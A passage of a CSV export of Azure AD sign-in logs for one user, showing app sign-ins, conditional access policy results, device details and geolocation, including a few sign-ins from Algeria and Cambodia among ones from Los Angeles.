10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003fb9820700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a052e7e-2284-4115-9ddd-003fb9820700,SigninLogs,Sucess,34.06555176,-118.2405396
+1543,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:58.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003f3c830700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a052e7e-2284-4115-9ddd-003f3c830700,SigninLogs,Sucess,34.06555176,-118.2405396
+1544,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:01.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5daf469f-c042-0000-5577-07a693e20938,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1dbd81fd-18f7-4582-ba72-d8f2f6aa0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1dbd81fd-18f7-4582-ba72-d8f2f6aa0800,SigninLogs,Sucess,34.06555176,-118.2405396
+1545,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:54.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",db359221-fdda-4bf1-8b37-6f461b180800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db359221-fdda-4bf1-8b37-6f461b180800,SigninLogs,Sucess,34.06555176,-118.2405396
+1546,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:21.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e2a4a5ec-d1fc-46ce-8e29-396b09e2d293,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",4f5563e9-cd91-4aaf-8dc5-b5eeef640800,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,4f5563e9-cd91-4aaf-8dc5-b5eeef640800,SigninLogs,Sucess,28,3
+1547,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:11.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d954f355-e372-4e44-8d83-5d6b52fffe84,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",89223cb6-60af-4a3e-b2e1-9470772c0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,89223cb6-60af-4a3e-b2e1-9470772c0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1548,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:59.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,44a5d594-baca-483e-98f8-b20c3833b412,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3109113e-8f92-47c2-a124-2483d23b0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,3109113e-8f92-47c2-a124-2483d23b0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1549,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:19.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c7c6f52b-c28a-4626-8521-7d0f254e23cd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",793d74e7-0f32-47f0-ad00-3e8cb0180800,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,793d74e7-0f32-47f0-ad00-3e8cb0180800,SigninLogs,Sucess,13,105
+1550,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:27.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4120b16b-fece-40dd-abb4-561d7327be1a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': 